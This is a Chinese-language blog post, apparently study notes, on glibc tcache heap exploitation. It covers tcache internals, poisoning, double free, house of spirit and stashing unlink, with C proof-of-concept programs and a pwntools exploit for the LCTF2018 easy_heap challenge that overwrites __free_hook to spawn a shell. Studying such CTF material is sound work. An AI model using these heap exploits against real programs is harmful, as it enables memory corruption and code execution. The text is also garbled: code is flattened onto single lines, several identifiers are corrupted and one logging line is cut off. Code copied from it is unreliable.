tcache overview

tcache机制在libc2.26之后新增,可以说它是类似于fastbin的机制,LIFO,但比fastbin的优先级更高,由名字可以看出它相当于一个缓存的作用。先看关于它的两个结构体 tcache_entrytcache_perthread_struct(见glibc2.27源码):

/* We overlay this structure on the user-data portion of a chunk whenthe chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{struct tcache_entry *next;
} tcache_entry;/* There is one of these for each thread, which contains theper-thread cache (hence "tcache_perthread_struct").  Keepingoverall size low is mildly important.  Note that COUNTS and ENTRIESare redundant (we could have just counted the linked list eachtime), this is for performance reasons.  */
typedef struct tcache_perthread_struct
{char counts[TCACHE_MAX_BINS];tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

可以看到tcache有一个next指针,指向下一个释放的tcache块,有定义TCACHE_MAX_BINS可知,最多有64个tcache bin,每个bin最多有7个tcache块:

/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
# define TCACHE_MAX_BINS        64
# define MAX_TCACHE_SIZE    tidx2usize (TCACHE_MAX_BINS-1)/* Only used to pre-fill the tunables.  */
# define tidx2usize(idx)    (((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)/* When "x" is from chunksize().  */
# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
/* When "x" is a user-provided size.  */
# define usize2tidx(x) csize2tidx (request2size (x))/* With rounding and alignment, the bins are...idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)idx 1   bytes 25..40 or 13..20idx 2   bytes 41..56 or 21..28etc.  *//* This is another arbitrary limit, which tunables can change.  Eachtcache bin will hold at most this number of chunks.  */


/* Caller must ensure that we know tc_idx is valid and there's roomfor more chunks.  */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{tcache_entry *e = (tcache_entry *) chunk2mem (chunk);assert (tc_idx < TCACHE_MAX_BINS);e->next = tcache->entries[tc_idx];tcache->entries[tc_idx] = e;++(tcache->counts[tc_idx]);
}/* Caller must ensure that we know tc_idx is valid and there'savailable chunks to remove.  */
static __always_inline void *
tcache_get (size_t tc_idx)
{tcache_entry *e = tcache->entries[tc_idx];assert (tc_idx < TCACHE_MAX_BINS);assert (tcache->entries[tc_idx] > 0);tcache->entries[tc_idx] = e->next;--(tcache->counts[tc_idx]);return (void *) e;

这两个函数会在init_free和__libc_malloc中调用,tcache_put分配大小不大于0x408且tchche bin未满时可调用,tcache_get也只检查了tc_idx是否合法,可看到就是链表删除和插入的操作,没有任何检查机制

内存申请: 在内存分配的 malloc 函数中有多处,会将内存块移入 tcache 中。

(1)首先,申请的内存块符合 fastbin 大小时并且在 fastbin 内找到可用的空闲块时,会把该 fastbin链上的其他内存块放入 tcache 中。

(2)其次,申请的内存块符合 smallbin 大小时并且在 smallbin 内找到可用的空闲块时,会把该 smallbin链上的其他内存块放入 tcache 中。

(3)当在 unsorted bin 链上循环处理时,当找到大小合适的链时,并不直接返回,而是先放到 tcache 中,继续处理。

tcache 取出:在内存申请的开始部分,首先会判断申请大小块,在 tcache 是否存在,如果存在就直接从 tcache中摘取,否则再使用_int_malloc 分配。

在循环处理 unsorted bin 内存块时,如果达到放入 unsorted bin 块最大数量,会立即返回。默认是 0,即不存在上限。

#if USE_TCACHE/* If we've processed as many chunks as we're allowed whilefilling the cache, return one of the cached ones.  */++tcache_unsorted_count;if (return_cached&& mp_.tcache_unsorted_limit > 0&& tcache_unsorted_count > mp_.tcache_unsorted_limit){return tcache_get (tc_idx);}

在循环处理 unsorted bin 内存块后,如果之前曾放入过 tcache 块,则会取出一个并返回。

#if USE_TCACHE/* If all the small chunks we found ended up cached, return one now.  */if (return_cached){return tcache_get (tc_idx);}

pwn tcache

tcache poisoning(覆盖next指针)


  1. 有溢出,可覆盖next指针或UAF
  2. 需要知道目的地址(堆、栈、bss)
    可以看出 tcache posioning 这种方法和 fastbin attack 类似,但因为没有 size 的限制有了更大的利用范围。

tcache dup(tcache的double free)

由于tcache在2.27-2.29上没有检测指针,可直接实现double free,比fastbin的double free好利用。
原理,将两个同样的chunk放入tcache,chunk1–>chunk1,先malloc chunk1,修改next指针为addr-anywhere使链表变为chunk1–>addr-anywhere,在经过两次malloc可申请到目标地址。然后可通过覆盖got表,修改函数指针达到利用目的。

  1. 需泄露地址(堆、栈、bss)、libc

tcache perthread corruption

tcache_perthread_struct 结构体包含了tcache的所有相关指针,如果我们能控制该结构体,就可以越过malloc size限制,malloc到任何地址。引用ctfwiki上的图:

通过一些手段(如 tcache posioning),我们将其改为了tcache_    +------------+<---------------------------+
\perthread |......      |                            |
\_struct   +------------+                            ||counts[i]   |                            |+------------+                            ||......      |          +----------+      |+------------+          |header    |      ||entries[i]  |--------->+----------+      |+------------+          |target    |------+|......      |          +----------+|            |          |          |+------------+          +----------+
这样,两次 malloc 后我们就返回了 tcache_perthread_struct 的地址,就可以控制整个 tcache 了。

条件:partial overwrite 部分覆盖

tcache house of spirit


#include <stdio.h>
#include <stdlib.h>int main()
{fprintf(stderr, "This file demonstrates the house of spirit attack on tcache.\n");fprintf(stderr, "It works in a similar way to original house of spirit but you don't need to create fake chunk after the fake chunk that will be freed.\n");fprintf(stderr, "You can see this in malloc.c in function _int_free that tcache_put is called without checking if next chunk's size and prev_inuse are sane.\n");fprintf(stderr, "(Search for strings \"invalid next size\" and \"double free or corruption\")\n\n");fprintf(stderr, "Ok. Let's start with the example!.\n\n");fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");malloc(1);fprintf(stderr, "Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n");unsigned long long *a; //pointer that will be overwrittenunsigned long long fake_chunks[10]; //fake chunk regionfprintf(stderr, "This region contains one fake chunk. It's size field is placed at %p\n", &fake_chunks[1]);fprintf(stderr, "This chunk size has to be falling into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");fake_chunks[1] = 0x40; // this is the sizefprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");a = &fake_chunks[2];fprintf(stderr, "Freeing the overwritten pointer.\n");free(a);fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));

smallbin unlink

在 smallbin 中包含有空闲块的时候,会同时将同大小的其他空闲块,放入 tcache 中,此时也会出现解链操作,但相比于 unlink 宏,缺少了链完整性校验。因此,原本 unlink 操作在该条件下也可以使用。

tcache stashing unlink attack

这种攻击利用的是 tcache bin 有剩余 (数量小于 TCACHE_MAX_BINS ) 时,同大小的 small bin 会放进 tcache 中 (这种情况可以用 calloc 分配同大小堆块触发,因为 calloc 分配堆块时不从 tcache bin 中选取)。在获取到一个 smallbin 中的一个 chunk 后会如果 tcache 仍有足够空闲位置,会将剩余的 small bin 链入 tcache ,在这个过程中只对第一个 bin 进行了完整性检查,后面的堆块的检查缺失。当攻击者可以写一个 small bin 的 bk 指针时,其可以在任意地址上写一个 libc 地址 (类似 unsorted bin attack 的效果)。构造得当的情况下也可以分配 fake chunk 到任意地址。

#include <stdio.h>
#include <stdlib.h>int main(){unsigned long stack_var[0x10] = {0};unsigned long *chunk_lis[0x10] = {0};unsigned long *target;fprintf(stderr, "This file demonstrates the stashing unlink attack on tcache.\n\n");fprintf(stderr, "This poc has been tested on both glibc 2.27 and glibc 2.29.\n\n");fprintf(stderr, "This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\n\n");fprintf(stderr, "The mechanism of putting smallbin into tcache in glibc gives us a chance to launch the attack.\n\n");fprintf(stderr, "This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we'll create the chunk on the stack.\n\n");// stack_var emulate the fake_chunk we want to alloc tofprintf(stderr, "Stack_var emulates the fake chunk we want to alloc to.\n\n");fprintf(stderr, "First let's write a writeable address to fake_chunk->bk to bypass bck->fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk->bk + 0x10) which is stack_var[4] will be a libc addr after attack.\n\n");stack_var[3] = (unsigned long)(&stack_var[2]);fprintf(stderr, "You can see the value of fake_chunk->bk is:%p\n\n",(void*)stack_var[3]);fprintf(stderr, "Also, let's see the initial value of stack_var[4]:%p\n\n",(void*)stack_var[4]);fprintf(stderr, "Now we alloc 9 chunks with malloc.\n\n");//now we malloc 9 chunksfor(int i = 0;i < 9;i++){chunk_lis[i] = (unsigned long*)malloc(0x90);}//put 7 tcachefprintf(stderr, "Then we free 7 of them in order to put them into tcache. Carefully we didn't free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\n\n");for(int i = 3;i < 9;i++){free(chunk_lis[i]);}fprintf(stderr, "As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\n\n");//last tcache binfree(chunk_lis[1]);//now they are put into unsorted binfree(chunk_lis[0]);free(chunk_lis[2]);//convert into small binfprintf(stderr, "Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\n\n");malloc(0xa0);//>0x90//now 5 tcache binsfprintf(stderr, "Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\n\n");malloc(0x90);malloc(0x90);fprintf(stderr, "Now we emulate a vulnerability that can overwrite the victim->bk pointer into fake_chunk addr: %p.\n\n",(void*)stack_var);//change victim->bck/*VULNERABILITY*/chunk_lis[2][1] = (unsigned long)stack_var;/*VULNERABILITY*///trigger the attackfprintf(stderr, "Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\n\n");calloc(1,0x90);fprintf(stderr, "Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck->fd has been changed into a libc addr: %p\n\n",(void*)stack_var[2],(void*)stack_var[4]);//malloc and return our fake chunk on stacktarget = malloc(0x90);   fprintf(stderr, "As you can see, next malloc(0x90) will return the region our fake chunk: %p\n",(void*)target);return 0;


  1. 构造fake chunk(stack_var[3] = (unsigned long)(&stack_var[2])这里&stack_var[2]代表可写地址)bypass bck->fd = bin in glibc
  2. 申请9个0x90chunk,然后free7个(3-8、1)填满tcache,free(0)、free(2)到unsortedbin
  3. 申请size>0x90 如0xa0,此时会匹配unstoredbin无匹配,会将unsortedbin 2->0 放入smallbin 2->0
  4. malloc两个tcache给之后free 的smallbin腾出位置
  5. 修改smallbin 2的bk为fake_chunk_addr
  6. calloc会从smallbin中匹配,匹配到chunk0,将其(fakechunk->chunk0)返回给用户,其余的链入tcache,根据smallbin由bk遍历,所以链入tcache顺序为fakechunk->chunk0
  7. 随后malloc将fakechunk申请出来

我们按照释放的先后顺序称 smallbin[sz] 中的两个 chunk 分别为 chunk0 和 chunk1。我们修改 chunk1 的bk 为 fake_chunk_addr。同时还要在 fake_chunk_addr->bk 处提前写一个可写地址writable_addr 。调用 calloc(size-0x10) 的时候会返回给用户 chunk0 (这是因为 smallbin 的 FIFO 分配机制),假设 tcache[sz] 中有 5 个空闲堆块,则有足够的位置容纳 chunk1 以及 fake_chunk。
在源码的检查中,只对第一个 chunk 的链表完整性做了检测 __glibc_unlikely (bck->fd != victim),后续堆块在放入过程中并没有检测。

因为 tcache 的分配机制是 LIFO ,所以位于 fake_chunk->bk 指针处的 fake_chunk 在链入 tcache 的时候反而会放到链表表头。在下一次调用 malloc(sz-0x10) 时会返回 fake_chunk+0x10 给用户,同时,由于bin->bk(writeable_addr) = bck;bck->fd(writeable_addr->fd) = bin; 的 unlink 操作,会使得 writable_addr+0x10 处被写入一个 libc 地址。

tcache check

glibc2.27没有对tcache double free做检测,但是我最近针对glibc2.27的tcache出了一个pwn题,远程搭建环境ubuntu18.04 glibc2.27但是出现了double free检测,不知道为啥,可能是版本问题吧,看glibc2.27源码里面也没有check相关的代码。

index 6d7a6a8..f730d7a 100644 (file)
--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -2967,6 +2967,8 @@ mremap_chunk (mchunkptr p, size_t new_size)typedef struct tcache_entry{struct tcache_entry *next;
+  /* This field exists to detect double frees.  */
+  struct tcache_perthread_struct *key;} tcache_entry;/* There is one of these for each thread, which contains the
@@ -2990,6 +2992,11 @@ tcache_put (mchunkptr chunk, size_t tc_idx){tcache_entry *e = (tcache_entry *) chunk2mem (chunk);assert (tc_idx < TCACHE_MAX_BINS);
+  /* Mark this chunk as "in the tcache" so the test in _int_free will
+     detect a double free.  */
+  e->key = tcache;
+e->next = tcache->entries[tc_idx];tcache->entries[tc_idx] = e;++(tcache->counts[tc_idx]);
@@ -3005,6 +3012,7 @@ tcache_get (size_t tc_idx)assert (tcache->entries[tc_idx] > 0);tcache->entries[tc_idx] = e->next;--(tcache->counts[tc_idx]);
+  e->key = NULL;return (void *) e;}@@ -4218,6 +4226,26 @@ _int_free (mstate av, mchunkptr p, int have_lock){size_t tc_idx = csize2tidx (size);+    /* Check to see if it's already in the tcache.  */
+    tcache_entry *e = (tcache_entry *) chunk2mem (p);
+    /* This test succeeds on double free.  However, we don't 100%
+       trust it (it also matches random payload data at a 1 in
+       2^<size_t> chance), so verify it's not an unlikely coincidence
+       before aborting.  */
+    if (__glibc_unlikely (e->key == tcache && tcache))
+      {+       tcache_entry *tmp;
+       LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+       for (tmp = tcache->entries[tc_idx];
+            tmp;
+            tmp = tmp->next)
+         if (tmp == e)
+           malloc_printerr ("free(): double free detected in tcache 2");
+       /* If we get here, it was a coincidence.  We've wasted a few
+          cycles, but don't abort.  */
+      }
+if (tcache&& tc_idx < mp_.tcache_bins&& tcache->counts[tc_idx] < mp_.tcache_count)

一般tcache_entry在heapbase+0x10的开始的位置,加了key字段检测的key字段会在chunk的bk位置写入struct的地址,可见,e->key == tcache为第一处检查,检查了key字段是否为tcache地址,然后进入后会逐个遍历tcachebin(7个元素)的每个元素,如果存在已经释放的该指针,那么检测到double free,抛出"free(): double free detected in tcache 2"异常错误。

  1. 使e->key == tcache不成立,需要存在溢出或UAF,能够修改key指针为不等于tcache的地址,成功bypass,但如果存在溢出能溢出到key字段,那直接覆盖next指针就可,一般此方法不会用到,太简单。
  2. 由源码可知,他是根据chunk size遍历与他相同的tcache bin,看是否有相同的指针已经是放过,此时我们可以在第二次free时,通过off by oneoff by null漏洞将其size改小使其放入其他tcachebin,从而实现两次free相同的地址,可以绕过检测。

LCTF2018 PWN easy_heap

利用思路:制造tcache的double free实现任意地址写。通过unsortedbin合并修改

  1. 制造三个unsortedbin A、B、C,依次释放
  2. A、B合并,C的pre_size为0x200
  3. A、B、C合并,C的pre_size仍为0x200
  4. 将A分配、B、C分配出去,不要覆盖到0x200
  5. 将B释放到tcache头,再将A释放,使得fd、bk为libc指针
  6. 分配B溢出使得C的pre_inuse位为0,此时A(free)–B(allocated)–C(allocated)
  7. free(C)使得ABC合成大块,B在使用。
  8. 分配A,使得fd的libc地址落入B中,而B恰好在使用,可以输出,从而泄露libc
  9. 此时B已经在使用且有指向,此时再分配一个指针指向B,B就有两个指向,然后将其free掉,构造tcache的double free
  10. 修改free hook为onegadget得到shell。
|     | <-- tcache perthread 结构体
| ... | <-- 6 个 tcache 块
|  A  | <-- 3 个 unsorted bin 块
|  B  |
|  C  |
|     | <-- tcache 块,防止 top 合并
| top |
|  .. |


|     | <-- tcache perthread 结构体
| ... | <-- 6 个 tcache 块 (free)
|  A  | <-- free
|  B  | <-- free 且为 tcache 块
|  C  |
|     | <-- tcache 块,防止 top 合并
| top |
|  .. |


|     | <-- tcache perthread 结构体
| ... | <-- 6 个 tcache 块 (free)
+-----+                     --------+
|  A  | <-- free 大块               |
+-----+                             |
|  B  | <-- 已分配          --------+--> 一个大 free 块
+-----+                             |
|  C  | <-- free                    |
+-----+                     --------+
|     | <-- tcache 块,防止 top 合并 (free)
| top |
|  .. |


|     | <-- tcache perthread 结构体
| ... | <-- 6 个 tcache 块 (free)
|  A  | <-- 已分配
|  B  | <-- 已分配          --------+> 一个大 free 块
+-----+                             |
|  C  | <-- free                    |
+-----+                     --------+
|     | <-- tcache 块,防止 top 合并 (free)
| top |
|  .. |


#! /usr/bin/env python2
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
import sys
import os
import os.path
from pwn import *
context(os='linux', arch='amd64', log_level='debug')p = process('./easy_heap')def cmd(idx):p.recvuntil('>')p.sendline(str(idx))def new(size, content):cmd(1)p.recvuntil('>')p.sendline(str(size))p.recvuntil('> ')if len(content) >= size:p.send(content)else:p.sendline(content)def delete(idx):cmd(2)p.recvuntil('index \n> ')p.sendline(str(idx))def show(idx):cmd(3)p.recvuntil('> ')p.sendline(str(idx))return p.recvline()[:-1]def main():# Your exploit script goes here# step 1: get three unsortedbin chunks# note that to avoid top consolidation, we need to arrange them like:# tcache * 6 -> unsortd  * 3 -> tcachefor i in range(7):new(0x10, str(i) + ' - tcache')for i in range(3):new(0x10, str(i + 7) + ' - unsorted') # three unsorted bin chunks# arrange:for i in range(6):delete(i)delete(9)for i in range(6, 9):delete(i)# step 2: use unsorted bin to overflow, and do unlink, trigger consolidation (overecvlineap)for i in range(7):new(0x10, str(i) + ' - tcache')# rearrange to take second unsorted bin into tcache chunk, but leave first # unsorted bin unchangednew(0x10, '7 - first')new(0x10, '8 - second')new(0x10, '9 - third')for i in range(6):delete(i)# move second into tcachedelete(8)# delete first to provide valid fd & bkdelete(7)new(0xf8, '0 - overflow')# fill up tcachedelete(6)# triggerdelete(9) #glibc2.29下会出错,有double free检测# step 3: leak, fill up for i in range(7):new(0x10, str(i) + ' - tcache')new(0x10, '8 - fillup')libc_leak = u64(show(0).strip().ljust(8, '\x00'))'libc leak {}'.format(hex(libc_leak)))libc = ELF('/lib/x86_64-linux-gnu/')libc.address = libc_leak - 0x3ebca0# step 4: constrecvuntilct UAF, write into __free_hooknew(0x10, '9 - next')# these two provides sendlineots for tcachedelete(1)delete(2)delete(0)delete(9)new(0x10, p64(libc.symbols['__free_hook'])) # 0new(0x10, '/bin/sh\x00into target') # 1one_gadget = libc.address + 0x4f322 new(0x10, p64(one_gadget))# system("/bin/sh\x00")delete(1)p.interactive()if __name__ == '__main__':main()

Tcache Attack相关推荐

  1. 好好说话之Tcache Attack(3):tcache stashing unlink attack

    tcache stashing unlink attack这种攻击利用有一个稍微绕的点,就是small bin中的空闲块挂进tcache bin这块.弯不大,仔细想想就好了 往期回顾: 好好说话之Tc ...

  2. 好好说话之Tcache Attack(2):tcache dup与tcache house of spirit

    这篇文章介绍了两种tcache的利用方法,tcache dup和tcache house of spirit,两种方法都是用how2heap中的例题作为讲解.由于tcache attack这部分的内容 ...

  3. 好好说话之Tcache Attack(1):tcache基础与tcache poisoning

    进入到了Tcache的部分,我还是觉得有必要多写一写基础的东西.以往的各种攻击手法都是假定没有tcache的,从练习二进制漏洞挖掘的角度来看其实我们一直模拟的都是很老的环境,那么这样一来其实和真正的生 ...

  4. 好好说话之Large Bin Attack

    large bin attack这种方法本质上并不难,只是有点绕而已.他和上一篇unsorted bin attack有点类似,都是chunk挂进bin链表的时候通过完成链表结构连接时发生的问题,只不 ...

  5. 好好说话之IO_FILE利用(1):利用_IO_2_1_stdout泄露libc

    前言 本来是在做tcache attack的例题的,但是wiki上的challenge2考察的重点不仅仅是在tcache.题目程序中没有输出的功能,所以无法像往常一样去泄露libc,这个时候就需要进行 ...

  6. 2021年“深育杯“网络安全大赛Writeup

    Misc 签到题 下载附件得到一张二维码 扫码关注,后台回复签到即可获得flag flag: SangFor{AaKjtQr_OjJpdA3QwBV_ndsKdn3vPgc_} Login 下载附件e ...

  7. [BluehensCTF 2022] pwn11 crypto3

    目录 PWN 1,pwn1 2,pwn 2 3,pwn 3 4,pwn 4 5,pwn 5 6,pwn 6 7,pwn7 8,pwn8 9,Sally Seashells 10,Sally The P ...

  8. 2021祥云杯部分pwn

    note 格式化字符串 本题考查了scanf的格式化字符串利用.一般我们用的都是printf的格式化字符串.这里是scanf 踩坑 一开始没有注意到sendline会多发一个换行符,导致往栈上$7的s ...

  9. house of pig详解

    在复现这题之前需要了解一些前置知识:libc2.31下的largebin_attack,tcache_stashing_unlink plus以及高版本glibc下的IO_FILE攻击 首先看到lib ...

  10. noxctf2018_grocery_listactf_2019_message

    noxctf2018_grocery_list 先是观察函数发现有一个可以泄露栈地址然后通过tcache attack打到栈上泄露libcbase然后再次写入free_hook拿到shell exp: ...


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